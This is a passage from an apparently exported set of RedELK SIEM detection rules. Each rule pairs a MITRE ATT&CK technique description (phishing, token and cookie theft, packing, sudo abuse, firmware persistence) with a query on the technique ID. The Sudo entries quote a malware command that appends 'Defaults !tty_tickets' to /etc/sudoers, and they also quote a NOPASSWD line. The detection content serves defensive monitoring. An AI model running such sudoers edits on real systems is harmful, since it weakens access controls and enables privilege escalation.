ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1216","name":"Signed Script Proxy Execution","id":"T1216"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1216","name":"Signed Script Proxy Execution","id":"T1216"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1518","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1518] Software Discovery","query":"threat.technique.id: T1518","references":["https://attack.mitre.org/techniques/T1518"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1518","name":"Software Discovery","id":"T1518"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Source","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1153","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1153] Source","query":"threat.technique.id: T1153","references":["https://attack.mitre.org/techniques/T1153"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1153","name":"Source","id":"T1153"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.[1]\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, [2] but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1045","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1045] Software Packing","query":"threat.technique.id: T1045","references":["https://attack.mitre.org/techniques/T1045","https://attack.mitre.org/techniques/T1027/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1045","name":"Software Packing","id":"T1045"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed [1].\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1151","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1151] Space after Filename","query":"threat.technique.id: T1151","references":["https://attack.mitre.org/techniques/T1151","https://attack.mitre.org/techniques/T1036/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1151","name":"Space after Filename","id":"T1151"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1151","name":"Space after Filename","id":"T1151"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1193","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1193] Spearphishing Attachment","query":"threat.technique.id: T1193","references":["https://attack.mitre.org/techniques/T1193","https://attack.mitre.org/techniques/T1566/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1193","name":"Spearphishing Attachment","id":"T1193"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1192","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1192] Spearphishing Link","query":"threat.technique.id: T1192","references":["https://attack.mitre.org/techniques/T1192","https://attack.mitre.org/techniques/T1566/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1192","name":"Spearphishing Link","id":"T1192"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing messages via third-party services in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1194","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1194] Spearphishing via Service","query":"threat.technique.id: T1194","references":["https://attack.mitre.org/techniques/T1194","https://attack.mitre.org/techniques/T1566/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1194","name":"Spearphishing via Service","id":"T1194"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1071","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1071] Standard Application Layer Protocol","query":"threat.technique.id: T1071","references":["https://attack.mitre.org/techniques/T1071"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1071","name":"Standard Application Layer Protocol","id":"T1071"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; [2] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1095","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1095] Standard Non-Application Layer Protocol","query":"threat.technique.id: T1095","references":["https://attack.mitre.org/techniques/T1095"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1095","name":"Standard Non-Application Layer Protocol","id":"T1095"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1032","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1032] Standard Cryptographic Protocol","query":"threat.technique.id: T1032","references":["https://attack.mitre.org/techniques/T1032","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1032","name":"Standard Cryptographic Protocol","id":"T1032"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).[1] OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.[2][3] An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.\nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.[4] Then, they can send a link through Spearphishing Link to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.[5]\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.[6][7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1528","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1528] Steal Application Access Token","query":"threat.technique.id: T1528","references":["https://attack.mitre.org/techniques/T1528"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1528","name":"Steal Application Access Token","id":"T1528"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. [1]\nThis is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism [2]. Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1165","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1165] Startup Items","query":"threat.technique.id: T1165","references":["https://attack.mitre.org/techniques/T1165","https://attack.mitre.org/techniques/T1037/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1165","name":"Startup Items","id":"T1165"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1165","name":"Startup Items","id":"T1165"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.[1]\nThere are several examples of malware targeting cookies from web browsers on the local system.[2][3] There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.[4][5]\nAfter an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1539","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1539] Steal Web Session Cookie","query":"threat.technique.id: T1539","references":["https://attack.mitre.org/techniques/T1539"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1539","name":"Steal Web Session Cookie","id":"T1539"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.[1][2] By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1492","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1492] Stored Data Manipulation","query":"threat.technique.id: T1492","references":["https://attack.mitre.org/techniques/T1492","https://attack.mitre.org/techniques/T1565/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1492","name":"Stored Data Manipulation","id":"T1492"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"[1] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL [2]. Elevated privileges are required to edit this file though.\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers [3]. In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1169","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1169] Sudo","query":"threat.technique.id: T1169","references":["https://attack.mitre.org/techniques/T1169","https://attack.mitre.org/techniques/T1548/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1169","name":"Sudo","id":"T1169"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"[1] Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL [2]. Elevated privileges are required to edit this file though.\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers [3]. In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1206","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1206] Sudo Caching","query":"threat.technique.id: T1206","references":["https://attack.mitre.org/techniques/T1206","https://attack.mitre.org/techniques/T1548/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1206","name":"Sudo Caching","id":"T1206"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\nSupply chain compromise can take place at any stage of the supply chain including:\nManipulation of development tools\nManipulation of a development environment\nManipulation of source code repositories (public or private)\nManipulation of source code in open-source dependencies\nManipulation of software update/distribution mechanisms\nCompromised/infected system images (multiple cases of removable media infected at the factory) [1] [2]\nReplacement of legitimate software with modified versions\nSales of modified/counterfeit products to legitimate distributors\nShipment interdiction\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. [3] [4] [5] Targeting may be specific to a desired victim set [6] or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. [3] [5] Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. [7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1195","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1195] Supply Chain Compromise","query":"threat.technique.id: T1195","references":["https://attack.mitre.org/techniques/T1195"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1195","name":"Supply Chain Compromise","id":"T1195"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nTools such as Systeminfo can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges.\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.[1][2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1082","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1082] System Information Discovery","query":"threat.technique.id: T1082","references":["https://attack.mitre.org/techniques/T1082"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1082","name":"System Information Discovery","id":"T1082"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. [1] [2] [3]\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1019","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1019] System Firmware","query":"threat.technique.id: T1019","references":["https://attack.mitre.org/techniques/T1019","https://attack.mitre.org/techniques/T1542/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1019","name":"System Firmware","id":"T1019"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.\nAdversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific 